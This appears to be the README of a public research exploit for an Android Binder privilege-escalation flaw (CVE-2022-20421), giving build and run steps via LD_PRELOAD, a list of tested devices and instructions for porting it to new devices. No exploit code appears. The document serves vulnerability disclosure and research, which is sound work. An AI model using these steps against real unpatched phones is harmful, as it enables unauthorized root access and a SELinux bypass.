Awesome
Bad Spin: Android Binder LPE
Author: Moshe Kol
Privilege escalation exploit from unstrusted_app
for Android Binder vulnerability (CVE-2022-20421). The vulnerability is patched on Android's Security Bulletin of October 2022. The exploit works on devices running kernel versions 5.4.x and 5.10.x, and it achieves full kernel R/W primitives. For the Google Pixel 6, it also obtains full root and SELinux bypass.
You can find the full write-up here.
Run from shell
- Compile the
libbadspin.so
library by typingmake push
in thesrc/
directory. This will also push the library to/data/local/tmp
. - Run
adb shell
. - Run
LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
. This will load the library and start the exploit.
Run from demo app
- Compile
libbadspin.so
by typingmake push
in thesrc/
directory. This will copy the library to theassets
directory for the demo Android app. - Compile the demo Android app in the
app/
directory. (You might need Android Studio to do this.) - Run the app and click on the "Exploit" button.
- Consume logs using:
adb logcat -s BADSPIN
Compilation options
You can pass the following variables to make
:
VERBOSE=1
to increase verbosity.TEST_VULN=1
to test the vulnerability without proceeding with the exploit.
Tested devices
$ make list
0: Samsung Galaxy S22, Android 12 (6/2022), kernel 5.10.81
1: Samsung Galaxy S21 Ultra, Android 12 (3/2022), kernel 5.4.129
2: Google Pixel 6, Android 12 (5/2022), kernel 5.10.66
3: Google Pixel 6, Android 13 (9/2022), kernel 5.10.107
Support a new device
It is not difficult to adapt the exploit and support a new device.
- Make sure your new device runs on kernel version 5.4.x or 5.10.x, and that its Android's security patch level is below October 2022.
- Add your device properties to
dev_config.h
. - Specify two function pointers:
kimg_to_lm()
: Converts a kernel image virtual pointer to the linear mapping.find_kbase()
: Finding the kernel base address from ananon_pipe_buf_ops
leaked pointer.
- Compile and run.
If it works for you, please submit a pull request.
Known issues
- The phone might crash on unsuccessful attempts.
- The exploit is unstable in the first few minutes after boot.
- Only works on kernel versions 5.4.x and 5.10.x.
- Only achieves kernel R/W on non-Pixel devices.